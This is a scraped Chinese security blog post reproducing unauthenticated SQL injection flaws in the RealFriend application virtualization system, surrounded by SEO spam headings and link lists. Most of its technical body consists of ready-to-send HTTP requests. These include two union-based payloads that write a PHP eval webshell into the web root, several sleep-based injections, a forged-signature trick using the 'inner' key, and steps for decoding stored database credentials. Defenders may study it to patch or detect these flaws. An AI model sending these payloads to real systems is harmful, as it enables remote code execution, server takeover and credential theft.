当前位置: 首页 > news >正文

网站建设商虎小程序网站自然排名工具

网站建设商虎小程序,网站自然排名工具,建站一般要多少钱,iis建立网站漏洞简介 微步在线漏洞团队通过“X漏洞奖励计划”获取到瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户…

漏洞简介

  微步在线漏洞团队通过“X漏洞奖励计划”获取到瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过WEB即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。

  漏洞是因为未授权接口在接收参数时没有进行处理校验,存在 SQL 注入漏洞,又因为集成环境中的 mysql 拥有写入文件的权限,所以写入 webshell 最终导致代码执行。

影响版本

  5.x <= 瑞友天翼应用虚拟化系统(GWT System) <= 7.0.2.

环境搭建

  从师傅处拷到的安装包 Gwt7.0.2.1.exe 默认模式安装,最后

90b4c4a1ead01ad7d8a89d6b19c4b2a6.png 7ef778594cf421c5b3a0332293edc07e.png

  在线注册获取试用 http://mop.realor.cn/TrialReg.aspx

73237d2e43769c9698e718cf1cfe0423.png 注册成功后   e18bca40e55e3b7f44a05d8938157746.png 登录页面 默认账号密码是  Admin/123 185d32ad8ef5cb24626538445e8d9120.png

  默认路径在 C:/Program Files (x86)/RealFriend/Rap Server/WebRoot

b4bd4ffc0138b180cd073ee191cd6520.png

  默认数据库配置地址 C:\Program Files (x86)\RealFriend\Rap Server\data\Config\CasDbCnn.dat

e3d012e5aa689d028ff815b7ad50cab7.png

  账号密码需要将其中的 # 替换为 = 并进行 base64 解码

漏洞复现与分析

  通过 http://192.168.222.148/RAPAgent.XGI?CMD=GetRegInfo 查看版本信息

9c444f46957d083dd10ffb6ed5199a7b.png

  为了方便查看后端实际执行的完整sql,我们可以使用框架提供的 getLastSql() 方法来 获取最近一次执行的SQL语句

f4d46d87291df918a5b0379f063adf0b.png

注入一__IndexController.class.php__dologin

  webroot/casweb/Home/Controller/IndexController.class.php:dologin

5c9a1b0d4f8f4b33fabb255f18d100b2.png 我们看到其中的 SQL 语句以及对该函数的请求路由

  http://www.casweb.cn.x/index.php?s=/Index/dologin/name/admin/pwd/c4ca4238a0b923820dcc509a6f75849b

  构造数据包 并打印出相对应的 sql 语句

c6dc40543c02e3ef0b68ca2b7b2f8f74.png 因为默认没有开启验证码,所以可以直接到达 SQL 语句处

  因为搭建环境时,使用了集成好的mysql 环境,拥有 DBA 的权限,所以可以在文件夹任意位置写入内容

show global variables like '%secure%';
7fd6d54ad4ef577853ef4f23e6f4ae28.png

  secure_file_priv='' #允许写入到任何文件夹

  利用报错信息得到项目的绝对路径

6ebaf27cbcc7fbc75ac688b296657bb5.png 构造payload
POST /index.php?s=/Index/dologin/name HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 221name=1')+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/dologin.php'#
a16779ea8363ee70dfd32910acdd2346.png 4022ee23165669fe44c607e2d8a256d1.png 8422f55e3190ead79f4b9d37d821c4ba.png

查询管理员用户的账户和密码

408a52febce55843c6ad5f389a3c2f78.png c3f66a7f01136e35a7670ba1462bc977.png

注入二__ConsoleExternalUploadApi.XGI

  webroot/ConsoleExternalUploadApi.XGI

86c094424e1a587b5dd9e61d9483843f.png
image
获取到三个参数,当三个参数都不为空时,调用  getfarminfo 来进行处理

  webroot/Function.XGI

ba3f2a22b583a7aa7a2ee527b82b028b.png

  webroot/Common.XGI

fbea08862aaa04c224b697986916ed72.png 对 key 值没有做任何校验,所以可以构造 payload 实现注入
POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/x-www-form-urlencodedinitParams=1&sign=2&key=FarmName'and sleep(5)#

  修改了代码 打印出了 SQL 命令

626f79ee1e6924cae92bd5518c9a7c9e.png 构造实现注入写入文件
POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 170
Content-Type: application/x-www-form-urlencodedinitParams=1&sign=1&key=1'union select '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/ConsoleExternalUploadApi.php'#
8d106c696491a4e6524f22e9ce1136c9.png cab3eb746b53ae1661716408f7e6d4ac.png 65ca4d320ca923c221331f074c41b3f2.png

注入三__ConsoleExternalUploadApi.XGI__uploadAuthorizeKeyFile

POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122initParams=command_uploadAuthorizeKeyFile__user_admin'and+sleep(5)#__pwd_1&key=inner&sign=d3adb9869bd6a377fa452930d920fd10
5d6bd38dc0e3ace4f470fe0a3c14d395.png

注入四__ConsoleExternalApi.XGI__createUser

  ‍

  之后的漏洞大抵上都可以描述为同一个漏洞,只是因为参数的不同,传入到不同的位置,在这里仅仅用一个来举例,之后的不再详细进行分析

  我们从 ConsoleExternalApi.XGI 进行分析

d6191eba054d1d76de594c16993d403d.png 通过 REQUEST 方法获取到参数   cdeef49e2316783ff2d0219310579b4e.png 通过接下来的这段代码,我们可以得到如下结论,当 $key 的值为  inner 时,$keyVal 是一个固定值,$sign 的值是  md5($initparams . $keyVal); $initparams 中需要包含  __ 来分割数据,得到每个参数   9e0080fddf55951cef39f6bc84b1de99.png 然后再通过  _ 分割 得到每个参数所对应的值 也就是当传入的值是 a_1__b_2 最后得到的也就是 a=1&b=2

  继续向下分析

568bc2ebba6bc1b1e9239f592051ea67.png 当传入的 cmd 的值是  createUser 时,进入相对应的分支,构造相对应的语句就可以实现注入。
POST /ConsoleExternalApi.XGI?initParams=command_createUser__user_admin__pwd_1&key=inner&sign=bd58378906794858b1f57eb272e5d84f HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/json{"account":"1'or sleep(5)#",
"userPwd":"1"}
2b38617b2b63f1c83f1d32623ed0ecc0.png

  ‍

注入五 __ConsoleExternalApi.XGI__getUserDetailByAccount

POST /ConsoleExternalApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 132initParams=command_getUserDetailByAccount__user_admin__account_1' or sleep(5) and '1&key=inner&sign=e24b8206a168347821a2f10aede99058
023bf97e0116e966e30da40a90f28cdf.png

原创稿件征集

征集原创技术文章中,欢迎投递

投稿邮箱:edu@antvsion.com

文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关

通过审核并发布能收获200-800元不等的稿酬。

更多详情,点我查看!

10b3189d75bc6cb1094ffb606072880f.gif

靶场实操,戳“阅读原文“

http://www.shuangfujiaoyu.com/news/38410.html

相关文章:

  • 最佳网站下载百度搜索
  • 手机免费自助建站系统中国网站排名前100
  • 番禺区保安服务公司百度搜索引擎seo
  • 网站建设入门解读seo推广效果
  • wordpress的mysql优化关键词的方法
  • 深圳做网站和视频宣传机构网站seo优化价格
  • 海北州公司网站建设百度搜索引擎入口
  • 武安企业做网站推广seo营销推广平台
  • 广州大题小做考研网站打开百度官网
  • 变装的他wordpress上海seo公司排名榜
  • 四站合一网站制作网站查询平台
  • 网站建设服务费入google play下载安卓
  • 网站如何快速被百度收录拼多多关键词排名在哪里看
  • 免费请美女做爰网站竞价排名广告
  • 重庆市网站建设基本seo
  • 丽江建设公司网站广州的百度推广公司
  • 房产网站建设公司正规教育培训机构
  • 张家港市做网站的公司网址提交百度
  • 网站后台插件下载黄页88推广多少钱一年
  • 宜城今日疫情状况成都seo网络优化公司
  • 怎么做触屏版网站搜索引擎哪个好用
  • 深圳制作网站培训机构经典的软文广告
  • 深圳外包网站今天上海最新新闻事件
  • 做企业网站进行推广要多少钱今日头条新闻最新
  • 义乌公司做网站杭州做seo的公司
  • 有网站怎么做下载直链百度2023免费下载
  • maka怎么做钓鱼网站web网页制作成品免费
  • tiktok海外运营推广优化公司
  • 表格可以做网站么百度热门搜索排行榜
  • 大连seo排名外包百度seo查询